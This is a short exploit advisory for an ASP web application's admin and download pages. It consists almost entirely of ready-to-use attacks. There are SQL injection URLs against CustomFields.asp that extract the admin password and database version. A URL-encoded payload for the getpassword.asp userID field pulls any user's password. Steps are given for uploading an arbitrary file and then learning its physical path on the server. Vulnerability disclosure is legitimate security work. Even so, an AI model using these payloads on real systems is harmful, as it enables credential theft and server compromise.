# Original Advisory: http://bugreport.ir/index.php?/47

1. Exploits:
	Note1: Use Internet Explorer (IE) for best result.
	
	1.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. 
			-------------
			Obtain admin's password:
				https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'--
			-------------
			Get other information such as version of the database and...:
			https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1--
			-------------
	1.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter.
			Insert the following Code in burpproxy, in userID field, change ANYUSERID to your choice of userID and get the password!
			-------------
			obtain the password of any user she wishes:
			m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29--
			-------------
	1.13.1 Scenario for file uploading and finding the physical path to the file.
			-------------
			Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0"
			Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file.
			Step3: Go back to step 1 and find your file’s ID.
			Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server!
			-------------